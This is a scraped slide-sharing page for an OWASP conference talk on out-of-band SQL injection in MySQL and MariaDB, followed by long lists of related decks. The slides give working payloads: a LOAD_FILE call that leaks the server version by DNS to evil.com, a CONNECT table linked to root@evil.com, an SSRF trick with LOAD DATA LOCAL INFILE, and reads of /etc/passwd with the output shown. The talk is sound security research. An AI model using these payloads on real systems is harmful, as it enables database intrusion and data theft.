[Russia] MySQL OOB injections

OWASP EEE
OWASP EEEOWASP
MySQL OOB injections Can I surprize you? @d0znpp
BIO @d0znpp ● Researcher ● Bug hunter ● Wallarm CEO
MySQL today ● MySQL (http://www.oracle.com/us/products/mysql/overview/index.html) ○ Enterprise Edition (http://www.oracle.com/us/products/mysql/mysqlenterprise/overview/index.html) ○ Standard Edition (http://www.oracle.com/us/products/mysql/mysqlstandard/overview/index.html) ○ Classic Edition (http://www.oracle.com/us/products/mysql/mysqlclassic/overview/index.html) ○ Community Edition (http://www.oracle.com/us/products/mysql/mysqlcommunityserver/overview/index.html) ○ Cluster CGE (http://www.oracle.com/us/products/mysql/mysqlcluster/overview/index.html) ○ Embedded (OEM/ISV) (http://www.oracle.com/us/products/mysql/mysqlembedded/overview/index.html) ● MariaDB (https://mariadb.org/) ● Percona (https://www.percona.com/) *out of scope
SQL injections summary ● Classic (data from query puts into response) a.k.a. “UNION SELECT” ● Blind (no SQL queries data puts into response) Blind SQli exploitation techniques: ● Using foreign objects (id='and(1<<(id-1)&length(load_file('/etc/passwd')))--) ● Error-based (when SQL errors puts into responses) ● Boolean search (when status code or smth. else indicates query status) ● Time-based (boolean search where query execution time indicates status) ● Out-of-band (OOB load_file(concat(‘’,version(),’.evil.comoob’)))
Why OOB? ● Faster ● Only one way to exploit asynchronous services What is asynchronous? ● I want to login. This is my credentials ● Ok. Wait... ● Is it ready? ● Is it ready?
[Russia] MySQL OOB injections
MySQL injections overview ● Cheat sheets ○ http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet ○ https://rdot.org/forum/showthread.php?t=124 ● Latest error-based tricks: ○ EXP (https://www.exploit-db.com/docs/37953.pdf) ○ Non-geometric (https://rdot.org/forum/showpost.php?p=37133&postcount=1) ○ BIGINT UNSIGNED (https://rdot.org/forum/showthread.php?t=3167) ○ JSON_* (https://twitter.com/dsrbr/status/649963694533775360)
Out-of-band for MySQL and Windows UNC filenames on Windows systems (http://arxiv.org/pdf/1303.3047.pdf by Miroslav Štampar) ● LOAD_FILE(concat(‘’,version(),’.evil.comoob’)) function ● SELECT … INTO (OUTFILE | DUMPFILE) ‘...’ And also other file access variants: ● LOAD DATA (LOCAL) INFILE ‘...’
[Russia] MySQL OOB injections
What you must know about “... LOCAL ...” ● LOAD DATA LOCAL INFILE executes on MySQL client. Not on server ● Client could define callback function for this (http://php.net/manual/ru/mysqli. set-local-infile-handler.php) ● By default this callback implemented in MySQL client driver ● This one supports all available wrappers in your platform ● LOAD DATA LOCAL INFILE ‘(http|php|expect|...)://...’ <- YES! Why not :) ● SSRF there
[Russia] MySQL OOB injections
FEDERATED storage engine OOB ● Different storage engines: MEMORY, CSV, ... ● FEDERATED storage engine (https://dev.mysql.com/doc/refman/5. 7/en/federated-storage-engine.html and https://mariadb. com/kb/en/mariadb/about-federatedx/) ● CREATE TABLE … ENGINE=FEDERATED CONNECTION=’mysql://…’
CONNECT storage engine OOB (MariaDB) ● Different storage engines: MEMORY, CSV, ... ● CONNECT storage engine (https://mariadb.com/kb/en/mariadb/connect-table- types-mysql-table-type-accessing-mysqlmariadb-tables/ https://mariadb. com/kb/en/mariadb/connect-security/) ● OOB through MYSQL and ODBC table_type ● CREATE TABLE t(id int) engine=CONNECT table_type=MYSQL connection='mysql://root@evil.com/database/table; The use of the CONNECT engine requires the FILE privilege for "outward" tables. This should not be an important restriction. The use of CONNECT "outward" tables on a remote server seems of limited interest without knowing the files existing on it and must be protected anyway. On the other hand, using it on the local client machine is not an issue because it is always possible to create locally a user with the FILE privilege.
MariaDB CONNECT ENGINE file access All of these table types supports file_name argument: ● DOS ● DBF ● BIN ● CSV ● FMT ● XML (no XXE there, sorry :) ● JSON ● INI
MariaDB CONNECT ENGINE file access MariaDB [test]> create table root(a varchar(1024)) engine=connect table_type=CSV file_name='/etc/passwd'; Query OK, 0 rows affected (0.00 sec) MariaDB [test]> select * from root; +-----------------------------------------------------------------------+ | a | +-----------------------------------------------------------------------+ | root:x:0:0:root:/root:/bin/bash | | bin:x:1:1:bin:/bin:/sbin/nologin | | daemon:x:2:2:daemon:/sbin:/sbin/nologin | | adm:x:3:4:adm:/var/adm:/sbin/nologin | | lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | | sync:x:5:0:sync:/sbin:/bin/sync | +-----------------------------------------------------------------------+ 7 rows in set (0.01 sec)
MariaDB CONNECT ENGINE piece of cheat https://mariadb.com/kb/en/mariadb/connect-table-types-special-virtual-tables/ … table_type=DIR file_name=’*.frm’ options=’subdir=1’ Also only for Windows: ● MAC (network adapter details) ● WMI (really)
[Russia] MySQL OOB injections
Summary DBApp Evil host You SQL queries FEDERATED, CONNECT LOAD DATA|XML LOCAL UNC load_file, INTO OUTFILE|DUMPF ILE
Thanks! Twitter: @d0znpp
1 of 19

[Russia] MySQL OOB injections

Download to read offline
Internet

MySQL OOB injections. Can I surprise you? Ivan Novikov

OWASP EEE
OWASP EEEOWASP

Recommended

Everything you always wanted to know about Redis but were afraid to ask by
Everything you always wanted to know about Redis but were afraid to askEverything you always wanted to know about Redis but were afraid to ask
Everything you always wanted to know about Redis but were afraid to askCarlos Abalde
26.9K views73 slides
암호화 이것만 알면 된다. by
암호화 이것만 알면 된다.암호화 이것만 알면 된다.
암호화 이것만 알면 된다.KwangSeob Jeong
60.1K views83 slides
MySQL Shell for DBAs by
MySQL Shell for DBAsMySQL Shell for DBAs
MySQL Shell for DBAsFrederic Descamps
365 views89 slides
IDOCS ALE by
IDOCS ALEIDOCS ALE
IDOCS ALESanthana Kishore
5K views107 slides
Delphi 6 básico by
Delphi 6 básicoDelphi 6 básico
Delphi 6 básicoDiogo Santos de Farias
8.7K views94 slides
MySQL Innovation Day Chicago - MySQL HA So Easy : That's insane !! by
MySQL Innovation Day Chicago - MySQL HA So Easy : That's insane !!MySQL Innovation Day Chicago - MySQL HA So Easy : That's insane !!
MySQL Innovation Day Chicago - MySQL HA So Easy : That's insane !!Frederic Descamps
579 views51 slides

More Related Content

What's hot

State of the Dolphin - May 2022 by
State of the Dolphin - May 2022State of the Dolphin - May 2022
State of the Dolphin - May 2022Frederic Descamps
199 views61 slides
sqlmap internals by
sqlmap internalssqlmap internals
sqlmap internalsMiroslav Stampar
2.6K views36 slides
Introduction to redis - version 2 by
Introduction to redis - version 2Introduction to redis - version 2
Introduction to redis - version 2Dvir Volk
9.9K views21 slides
What should a hacker know about WebDav? by
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?Mikhail Egorov
8.5K views18 slides
ORM2Pwn: Exploiting injections in Hibernate ORM by
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
42.3K views28 slides
SQL Injection INSERT ON DUPLICATE KEY trick by
SQL Injection INSERT ON DUPLICATE KEY trickSQL Injection INSERT ON DUPLICATE KEY trick
SQL Injection INSERT ON DUPLICATE KEY trickMathias Karlsson
1.4K views7 slides

What's hot(20)

State of the Dolphin - May 2022 by Frederic Descamps
State of the Dolphin - May 2022State of the Dolphin - May 2022
State of the Dolphin - May 2022
Frederic Descamps199 views
sqlmap internals by Miroslav Stampar
sqlmap internalssqlmap internals
sqlmap internals
Miroslav Stampar2.6K views
Introduction to redis - version 2 by Dvir Volk
Introduction to redis - version 2Introduction to redis - version 2
Introduction to redis - version 2
Dvir Volk9.9K views
What should a hacker know about WebDav? by Mikhail Egorov
What should a hacker know about WebDav?What should a hacker know about WebDav?
What should a hacker know about WebDav?
Mikhail Egorov8.5K views
ORM2Pwn: Exploiting injections in Hibernate ORM by Mikhail Egorov
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
Mikhail Egorov42.3K views
SQL Injection INSERT ON DUPLICATE KEY trick by Mathias Karlsson
SQL Injection INSERT ON DUPLICATE KEY trickSQL Injection INSERT ON DUPLICATE KEY trick
SQL Injection INSERT ON DUPLICATE KEY trick
Mathias Karlsson1.4K views
Introduction to BOL programming by Roel van den Berge
Introduction to BOL programmingIntroduction to BOL programming
Introduction to BOL programming
Roel van den Berge15.1K views
Bypassing anti virus using powershell by abend_cve_9999_0001
Bypassing anti virus using powershellBypassing anti virus using powershell
Bypassing anti virus using powershell
abend_cve_9999_00016K views
Percona Live 2022 - The Evolution of a MySQL Database System by Frederic Descamps
Percona Live 2022 - The Evolution of a MySQL Database SystemPercona Live 2022 - The Evolution of a MySQL Database System
Percona Live 2022 - The Evolution of a MySQL Database System
Frederic Descamps390 views
Lazy vs. Eager Loading Strategies in JPA 2.1 by Patrycja Wegrzynowicz
Lazy vs. Eager Loading Strategies in JPA 2.1Lazy vs. Eager Loading Strategies in JPA 2.1
Lazy vs. Eager Loading Strategies in JPA 2.1
Patrycja Wegrzynowicz4.5K views
Introduction to SOLID Principles by Ganesh Samarthyam
Introduction to SOLID PrinciplesIntroduction to SOLID Principles
Introduction to SOLID Principles
Ganesh Samarthyam2.8K views
Fiori for s4 hana troubleshooting tips and tricks by Jasbir Khanuja
Fiori for s4 hana troubleshooting tips and tricksFiori for s4 hana troubleshooting tips and tricks
Fiori for s4 hana troubleshooting tips and tricks
Jasbir Khanuja7.8K views
Aem dispatcher – tips & tricks by Ashokkumar T A
Aem dispatcher – tips & tricksAem dispatcher – tips & tricks
Aem dispatcher – tips & tricks
Ashokkumar T A5.4K views
My sql failover test using orchestrator by YoungHeon (Roy) Kim
My sql failover test using orchestratorMy sql failover test using orchestrator
My sql failover test using orchestrator
YoungHeon (Roy) Kim1.6K views
Time-Based Blind SQL Injection by matt_presson
Time-Based Blind SQL InjectionTime-Based Blind SQL Injection
Time-Based Blind SQL Injection
matt_presson11.7K views
Aem sling resolution by Gaurav Tiwari
Aem sling resolutionAem sling resolution
Aem sling resolution
Gaurav Tiwari263 views
MySQL InnoDB Cluster - New Features in 8.0 Releases - Best Practices by Kenny Gryp
MySQL InnoDB Cluster - New Features in 8.0 Releases - Best PracticesMySQL InnoDB Cluster - New Features in 8.0 Releases - Best Practices
MySQL InnoDB Cluster - New Features in 8.0 Releases - Best Practices
Kenny Gryp2.9K views
Percona Live 2022 - MySQL Shell for Visual Studio Code by Frederic Descamps
Percona Live 2022 - MySQL Shell for Visual Studio CodePercona Live 2022 - MySQL Shell for Visual Studio Code
Percona Live 2022 - MySQL Shell for Visual Studio Code
Frederic Descamps432 views
Polyglot payloads in practice by avlidienbrunn at HackPra by Mathias Karlsson
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPra
Mathias Karlsson14.5K views
DerbyCon 2019 - Kerberoasting Revisited by Will Schroeder
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder10.4K views

Viewers also liked

Database honeypot by design by
Database honeypot by designDatabase honeypot by design
Database honeypot by designqqlan
6.6K views23 slides
Advanced data mining in my sql injections using subqueries and custom variables by
Advanced data mining in my sql injections using subqueries and custom variablesAdvanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variablesDefCamp
4.9K views20 slides
[Cluj] CSP (Content Security Policy) by
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)OWASP EEE
576 views13 slides
RESUME OF MAHFUZUR RAHMAN_Oct' 15 by
RESUME OF MAHFUZUR RAHMAN_Oct' 15RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15Mahfuzur Rahman
317 views7 slides
Dia da Música by
Dia da MúsicaDia da Música
Dia da MúsicaPaulo Antunes
1.2K views18 slides
[Austria] Security by Design by
[Austria] Security by Design[Austria] Security by Design
[Austria] Security by DesignOWASP EEE
665 views16 slides

Viewers also liked(18)

Database honeypot by design by qqlan
Database honeypot by designDatabase honeypot by design
Database honeypot by design
qqlan6.6K views
Advanced data mining in my sql injections using subqueries and custom variables by DefCamp
Advanced data mining in my sql injections using subqueries and custom variablesAdvanced data mining in my sql injections using subqueries and custom variables
Advanced data mining in my sql injections using subqueries and custom variables
DefCamp4.9K views
[Cluj] CSP (Content Security Policy) by OWASP EEE
[Cluj] CSP (Content Security Policy)[Cluj] CSP (Content Security Policy)
[Cluj] CSP (Content Security Policy)
OWASP EEE576 views
RESUME OF MAHFUZUR RAHMAN_Oct' 15 by Mahfuzur Rahman
RESUME OF MAHFUZUR RAHMAN_Oct' 15RESUME OF MAHFUZUR RAHMAN_Oct' 15
RESUME OF MAHFUZUR RAHMAN_Oct' 15
Mahfuzur Rahman317 views
Dia da Música by Paulo Antunes
Dia da MúsicaDia da Música
Dia da Música
Paulo Antunes1.2K views
[Austria] Security by Design by OWASP EEE
[Austria] Security by Design[Austria] Security by Design
[Austria] Security by Design
OWASP EEE665 views
[Lithuania] Introduction to threat modeling by OWASP EEE
[Lithuania] Introduction to threat modeling[Lithuania] Introduction to threat modeling
[Lithuania] Introduction to threat modeling
OWASP EEE444 views
[Russia] Node.JS - Architecture and Vulnerabilities by OWASP EEE
[Russia] Node.JS - Architecture and Vulnerabilities[Russia] Node.JS - Architecture and Vulnerabilities
[Russia] Node.JS - Architecture and Vulnerabilities
OWASP EEE560 views
[Russia] Give me a stable input by OWASP EEE
[Russia] Give me a stable input[Russia] Give me a stable input
[Russia] Give me a stable input
OWASP EEE335 views
[Lithuania] DigiCerts and DigiID to Enterprise apps by OWASP EEE
[Lithuania] DigiCerts and DigiID to Enterprise apps[Lithuania] DigiCerts and DigiID to Enterprise apps
[Lithuania] DigiCerts and DigiID to Enterprise apps
OWASP EEE350 views
[Bucharest] XML Based Attacks by OWASP EEE
[Bucharest] XML Based Attacks[Bucharest] XML Based Attacks
[Bucharest] XML Based Attacks
OWASP EEE610 views
[Bucharest] Catching up with today's malicious actors by OWASP EEE
[Bucharest] Catching up with today's malicious actors[Bucharest] Catching up with today's malicious actors
[Bucharest] Catching up with today's malicious actors
OWASP EEE431 views
[Lithuania] I am the cavalry by OWASP EEE
[Lithuania] I am the cavalry[Lithuania] I am the cavalry
[Lithuania] I am the cavalry
OWASP EEE539 views
[Poland] It's only about frontend by OWASP EEE
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
OWASP EEE521 views
Beginning PHPUnit by Jace Ju
Beginning PHPUnitBeginning PHPUnit
Beginning PHPUnit
Jace Ju2.3K views
Advanced SQL Injection by amiable_indian
Advanced SQL InjectionAdvanced SQL Injection
Advanced SQL Injection
amiable_indian31.4K views
Make profit with UI-Redressing attacks. by n|u - The Open Security Community
Make profit with UI-Redressing attacks.Make profit with UI-Redressing attacks.
Make profit with UI-Redressing attacks.
n|u - The Open Security Community159.3K views
CloudFlare vs Incapsula: Round 2 by Zero Science Lab
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2
Zero Science Lab84.1K views

Similar to [Russia] MySQL OOB injections

How to create a useful MySQL bug report by
How to create a useful MySQL bug reportHow to create a useful MySQL bug report
How to create a useful MySQL bug reportValerii Kravchuk
1.3K views16 slides
My sql resources_april2012_zht by
My sql resources_april2012_zhtMy sql resources_april2012_zht
My sql resources_april2012_zhtIvan Tu
386 views5 slides
Ukoug 2011 mysql_arch_for_orcl_dba by
Ukoug 2011 mysql_arch_for_orcl_dbaUkoug 2011 mysql_arch_for_orcl_dba
Ukoug 2011 mysql_arch_for_orcl_dbaorablue11
245 views32 slides
FOSDEM 2015: gdb tips and tricks for MySQL DBAs by
FOSDEM 2015: gdb tips and tricks for MySQL DBAsFOSDEM 2015: gdb tips and tricks for MySQL DBAs
FOSDEM 2015: gdb tips and tricks for MySQL DBAsValerii Kravchuk
2.4K views13 slides
The Full MySQL and MariaDB Parallel Replication Tutorial by
The Full MySQL and MariaDB Parallel Replication TutorialThe Full MySQL and MariaDB Parallel Replication Tutorial
The Full MySQL and MariaDB Parallel Replication TutorialJean-François Gagné
3.3K views113 slides
More on gdb for my sql db as (fosdem 2016) by
More on gdb for my sql db as (fosdem 2016)More on gdb for my sql db as (fosdem 2016)
More on gdb for my sql db as (fosdem 2016)Valeriy Kravchuk
1.8K views20 slides

Similar to [Russia] MySQL OOB injections(20)

How to create a useful MySQL bug report by Valerii Kravchuk
How to create a useful MySQL bug reportHow to create a useful MySQL bug report
How to create a useful MySQL bug report
Valerii Kravchuk1.3K views
My sql resources_april2012_zht by Ivan Tu
My sql resources_april2012_zhtMy sql resources_april2012_zht
My sql resources_april2012_zht
Ivan Tu386 views
Ukoug 2011 mysql_arch_for_orcl_dba by orablue11
Ukoug 2011 mysql_arch_for_orcl_dbaUkoug 2011 mysql_arch_for_orcl_dba
Ukoug 2011 mysql_arch_for_orcl_dba
orablue11245 views
FOSDEM 2015: gdb tips and tricks for MySQL DBAs by Valerii Kravchuk
FOSDEM 2015: gdb tips and tricks for MySQL DBAsFOSDEM 2015: gdb tips and tricks for MySQL DBAs
FOSDEM 2015: gdb tips and tricks for MySQL DBAs
Valerii Kravchuk2.4K views
The Full MySQL and MariaDB Parallel Replication Tutorial by Jean-François Gagné
The Full MySQL and MariaDB Parallel Replication TutorialThe Full MySQL and MariaDB Parallel Replication Tutorial
The Full MySQL and MariaDB Parallel Replication Tutorial
Jean-François Gagné3.3K views
More on gdb for my sql db as (fosdem 2016) by Valeriy Kravchuk
More on gdb for my sql db as (fosdem 2016)More on gdb for my sql db as (fosdem 2016)
More on gdb for my sql db as (fosdem 2016)
Valeriy Kravchuk1.8K views
2016-01-16 03 Денис Нелюбин. How to test a million by Омские ИТ-субботники
2016-01-16 03 Денис Нелюбин. How to test a million2016-01-16 03 Денис Нелюбин. How to test a million
2016-01-16 03 Денис Нелюбин. How to test a million
Омские ИТ-субботники192 views
Doctrine Project by Daniel Lima
Doctrine ProjectDoctrine Project
Doctrine Project
Daniel Lima468 views
Applying profilers to my sql (fosdem 2017) by Valeriy Kravchuk
Applying profilers to my sql (fosdem 2017)Applying profilers to my sql (fosdem 2017)
Applying profilers to my sql (fosdem 2017)
Valeriy Kravchuk852 views
Gdb basics for my sql db as (openfest 2017) final by Valeriy Kravchuk
Gdb basics for my sql db as (openfest 2017) finalGdb basics for my sql db as (openfest 2017) final
Gdb basics for my sql db as (openfest 2017) final
Valeriy Kravchuk912 views
High performance and high availability proxies for MySQL by Mydbops
High performance and high availability proxies for MySQLHigh performance and high availability proxies for MySQL
High performance and high availability proxies for MySQL
Mydbops1.7K views
MySQL for Oracle DBAs by FromDual GmbH
MySQL for Oracle DBAsMySQL for Oracle DBAs
MySQL for Oracle DBAs
FromDual GmbH812 views
Scaling up and accelerating Drupal 8 with NoSQL by OSInet
Scaling up and accelerating Drupal 8 with NoSQLScaling up and accelerating Drupal 8 with NoSQL
Scaling up and accelerating Drupal 8 with NoSQL
OSInet1.4K views
MySQL 5.6 Performance by MYXPLAIN
MySQL 5.6 PerformanceMySQL 5.6 Performance
MySQL 5.6 Performance
MYXPLAIN8.1K views
MySQL always-up with Galera Cluster by FromDual GmbH
MySQL always-up with Galera ClusterMySQL always-up with Galera Cluster
MySQL always-up with Galera Cluster
FromDual GmbH1.2K views
Autolab Workshop by Mihir Pandya
Autolab WorkshopAutolab Workshop
Autolab Workshop
Mihir Pandya506 views
MariaDB/MySQL pitfalls - And how to come out again... by FromDual GmbH
MariaDB/MySQL pitfalls - And how to come out again...MariaDB/MySQL pitfalls - And how to come out again...
MariaDB/MySQL pitfalls - And how to come out again...
FromDual GmbH88 views
MySQL Performance Tuning Variables by FromDual GmbH
MySQL Performance Tuning VariablesMySQL Performance Tuning Variables
MySQL Performance Tuning Variables
FromDual GmbH2.2K views
MariaDB Paris Workshop 2023 - Performance Optimization by MariaDB plc
MariaDB Paris Workshop 2023 - Performance OptimizationMariaDB Paris Workshop 2023 - Performance Optimization
MariaDB Paris Workshop 2023 - Performance Optimization
MariaDB plc36 views
MariaDB 10.0 - SkySQL Paris Meetup by MariaDB Corporation
MariaDB 10.0 - SkySQL Paris MeetupMariaDB 10.0 - SkySQL Paris Meetup
MariaDB 10.0 - SkySQL Paris Meetup
MariaDB Corporation4.5K views

More from OWASP EEE

[Austria] ZigBee exploited by
[Austria] ZigBee exploited[Austria] ZigBee exploited
[Austria] ZigBee exploitedOWASP EEE
747 views48 slides
[Austria] How we hacked an online mobile banking Trojan by
[Austria] How we hacked an online mobile banking Trojan[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking TrojanOWASP EEE
654 views41 slides
[Poland] SecOps live cooking with OWASP appsec tools by
[Poland] SecOps live cooking with OWASP appsec tools[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec toolsOWASP EEE
461 views35 slides
[Cluj] Turn SSL ON by
[Cluj] Turn SSL ON[Cluj] Turn SSL ON
[Cluj] Turn SSL ONOWASP EEE
406 views16 slides
[Cluj] Information Security Through Gamification by
[Cluj] Information Security Through Gamification[Cluj] Information Security Through Gamification
[Cluj] Information Security Through GamificationOWASP EEE
585 views17 slides
[Cluj] A distributed - collaborative client certification system by
[Cluj] A distributed - collaborative client certification system[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification systemOWASP EEE
163 views14 slides

More from OWASP EEE(17)

[Austria] ZigBee exploited by OWASP EEE
[Austria] ZigBee exploited[Austria] ZigBee exploited
[Austria] ZigBee exploited
OWASP EEE747 views
[Austria] How we hacked an online mobile banking Trojan by OWASP EEE
[Austria] How we hacked an online mobile banking Trojan[Austria] How we hacked an online mobile banking Trojan
[Austria] How we hacked an online mobile banking Trojan
OWASP EEE654 views
[Poland] SecOps live cooking with OWASP appsec tools by OWASP EEE
[Poland] SecOps live cooking with OWASP appsec tools[Poland] SecOps live cooking with OWASP appsec tools
[Poland] SecOps live cooking with OWASP appsec tools
OWASP EEE461 views
[Cluj] Turn SSL ON by OWASP EEE
[Cluj] Turn SSL ON[Cluj] Turn SSL ON
[Cluj] Turn SSL ON
OWASP EEE406 views
[Cluj] Information Security Through Gamification by OWASP EEE
[Cluj] Information Security Through Gamification[Cluj] Information Security Through Gamification
[Cluj] Information Security Through Gamification
OWASP EEE585 views
[Cluj] A distributed - collaborative client certification system by OWASP EEE
[Cluj] A distributed - collaborative client certification system[Cluj] A distributed - collaborative client certification system
[Cluj] A distributed - collaborative client certification system
OWASP EEE163 views
[Russia] Bugs -> max, time &lt;= T by OWASP EEE
[Russia] Bugs -> max, time &lt;= T[Russia] Bugs -> max, time &lt;= T
[Russia] Bugs -> max, time &lt;= T
OWASP EEE346 views
[Russia] Building better product security by OWASP EEE
[Russia] Building better product security[Russia] Building better product security
[Russia] Building better product security
OWASP EEE382 views
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent by OWASP EEE
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
[Lithuania] Cross-site request forgery: ways to exploit, ways to prevent
OWASP EEE774 views
[Hungary] I play Jack of Information Disclosure by OWASP EEE
[Hungary] I play Jack of Information Disclosure[Hungary] I play Jack of Information Disclosure
[Hungary] I play Jack of Information Disclosure
OWASP EEE510 views
[Hungary] Survival is not mandatory. The air force one has departured are you... by OWASP EEE
[Hungary] Survival is not mandatory. The air force one has departured are you...[Hungary] Survival is not mandatory. The air force one has departured are you...
[Hungary] Survival is not mandatory. The air force one has departured are you...
OWASP EEE378 views
[Hungary] Secure Software? Start appreciating your developers! by OWASP EEE
[Hungary] Secure Software? Start appreciating your developers![Hungary] Secure Software? Start appreciating your developers!
[Hungary] Secure Software? Start appreciating your developers!
OWASP EEE237 views
[Bucharest] Your intents are dirty, droid! by OWASP EEE
[Bucharest] Your intents are dirty, droid![Bucharest] Your intents are dirty, droid!
[Bucharest] Your intents are dirty, droid!
OWASP EEE390 views
[Bucharest] #DontTrustTheDarkSide by OWASP EEE
[Bucharest] #DontTrustTheDarkSide[Bucharest] #DontTrustTheDarkSide
[Bucharest] #DontTrustTheDarkSide
OWASP EEE517 views
[Bucharest] From SCADA to IoT Cyber Security by OWASP EEE
[Bucharest] From SCADA to IoT Cyber Security[Bucharest] From SCADA to IoT Cyber Security
[Bucharest] From SCADA to IoT Cyber Security
OWASP EEE1.1K views
[Bucharest] Reversing the Apple Sandbox by OWASP EEE
[Bucharest] Reversing the Apple Sandbox[Bucharest] Reversing the Apple Sandbox
[Bucharest] Reversing the Apple Sandbox
OWASP EEE338 views
[Bucharest] Attack is easy, let's talk defence by OWASP EEE
[Bucharest] Attack is easy, let's talk defence[Bucharest] Attack is easy, let's talk defence
[Bucharest] Attack is easy, let's talk defence
OWASP EEE792 views

Recently uploaded

Affiliate Marketing by
Affiliate MarketingAffiliate Marketing
Affiliate MarketingNavin Dhanuka
18 views30 slides
How to think like a threat actor for Kubernetes.pptx by
How to think like a threat actor for Kubernetes.pptxHow to think like a threat actor for Kubernetes.pptx
How to think like a threat actor for Kubernetes.pptxLibbySchulze1
7 views33 slides
The Dark Web : Hidden Services by
The Dark Web : Hidden ServicesThe Dark Web : Hidden Services
The Dark Web : Hidden ServicesAnshu Singh
16 views24 slides
hamro digital logics.pptx by
hamro digital logics.pptxhamro digital logics.pptx
hamro digital logics.pptxtupeshghimire
10 views36 slides
Marketing and Community Building in Web3 by
Marketing and Community Building in Web3Marketing and Community Building in Web3
Marketing and Community Building in Web3Federico Ast
15 views64 slides
ATPMOUSE_융합2조.pptx by
ATPMOUSE_융합2조.pptxATPMOUSE_융합2조.pptx
ATPMOUSE_융합2조.pptxkts120898
35 views70 slides

Recently uploaded(6)

Affiliate Marketing by Navin Dhanuka
Affiliate MarketingAffiliate Marketing
Affiliate Marketing
Navin Dhanuka18 views
How to think like a threat actor for Kubernetes.pptx by LibbySchulze1
How to think like a threat actor for Kubernetes.pptxHow to think like a threat actor for Kubernetes.pptx
How to think like a threat actor for Kubernetes.pptx
LibbySchulze17 views
The Dark Web : Hidden Services by Anshu Singh
The Dark Web : Hidden ServicesThe Dark Web : Hidden Services
The Dark Web : Hidden Services
Anshu Singh16 views
hamro digital logics.pptx by tupeshghimire
hamro digital logics.pptxhamro digital logics.pptx
hamro digital logics.pptx
tupeshghimire10 views
Marketing and Community Building in Web3 by Federico Ast
Marketing and Community Building in Web3Marketing and Community Building in Web3
Marketing and Community Building in Web3
Federico Ast15 views
ATPMOUSE_융합2조.pptx by kts120898
ATPMOUSE_융합2조.pptxATPMOUSE_융합2조.pptx
ATPMOUSE_융합2조.pptx
kts12089835 views

[Russia] MySQL OOB injections

  • 2. BIO @d0znpp ● Researcher ● Bug hunter ● Wallarm CEO
  • 3. MySQL today ● MySQL (http://www.oracle.com/us/products/mysql/overview/index.html) ○ Enterprise Edition (http://www.oracle.com/us/products/mysql/mysqlenterprise/overview/index.html) ○ Standard Edition (http://www.oracle.com/us/products/mysql/mysqlstandard/overview/index.html) ○ Classic Edition (http://www.oracle.com/us/products/mysql/mysqlclassic/overview/index.html) ○ Community Edition (http://www.oracle.com/us/products/mysql/mysqlcommunityserver/overview/index.html) ○ Cluster CGE (http://www.oracle.com/us/products/mysql/mysqlcluster/overview/index.html) ○ Embedded (OEM/ISV) (http://www.oracle.com/us/products/mysql/mysqlembedded/overview/index.html) ● MariaDB (https://mariadb.org/) ● Percona (https://www.percona.com/) *out of scope
  • 4. SQL injections summary ● Classic (data from query puts into response) a.k.a. “UNION SELECT” ● Blind (no SQL queries data puts into response) Blind SQli exploitation techniques: ● Using foreign objects (id='and(1<<(id-1)&length(load_file('/etc/passwd')))--) ● Error-based (when SQL errors puts into responses) ● Boolean search (when status code or smth. else indicates query status) ● Time-based (boolean search where query execution time indicates status) ● Out-of-band (OOB load_file(concat(‘’,version(),’.evil.comoob’)))
  • 5. Why OOB? ● Faster ● Only one way to exploit asynchronous services What is asynchronous? ● I want to login. This is my credentials ● Ok. Wait... ● Is it ready? ● Is it ready?
  • 7. MySQL injections overview ● Cheat sheets ○ http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet ○ https://rdot.org/forum/showthread.php?t=124 ● Latest error-based tricks: ○ EXP (https://www.exploit-db.com/docs/37953.pdf) ○ Non-geometric (https://rdot.org/forum/showpost.php?p=37133&postcount=1) ○ BIGINT UNSIGNED (https://rdot.org/forum/showthread.php?t=3167) ○ JSON_* (https://twitter.com/dsrbr/status/649963694533775360)
  • 8. Out-of-band for MySQL and Windows UNC filenames on Windows systems (http://arxiv.org/pdf/1303.3047.pdf by Miroslav Štampar) ● LOAD_FILE(concat(‘’,version(),’.evil.comoob’)) function ● SELECT … INTO (OUTFILE | DUMPFILE) ‘...’ And also other file access variants: ● LOAD DATA (LOCAL) INFILE ‘...’
  • 10. What you must know about “... LOCAL ...” ● LOAD DATA LOCAL INFILE executes on MySQL client. Not on server ● Client could define callback function for this (http://php.net/manual/ru/mysqli. set-local-infile-handler.php) ● By default this callback implemented in MySQL client driver ● This one supports all available wrappers in your platform ● LOAD DATA LOCAL INFILE ‘(http|php|expect|...)://...’ <- YES! Why not :) ● SSRF there
  • 12. FEDERATED storage engine OOB ● Different storage engines: MEMORY, CSV, ... ● FEDERATED storage engine (https://dev.mysql.com/doc/refman/5. 7/en/federated-storage-engine.html and https://mariadb. com/kb/en/mariadb/about-federatedx/) ● CREATE TABLE … ENGINE=FEDERATED CONNECTION=’mysql://…’
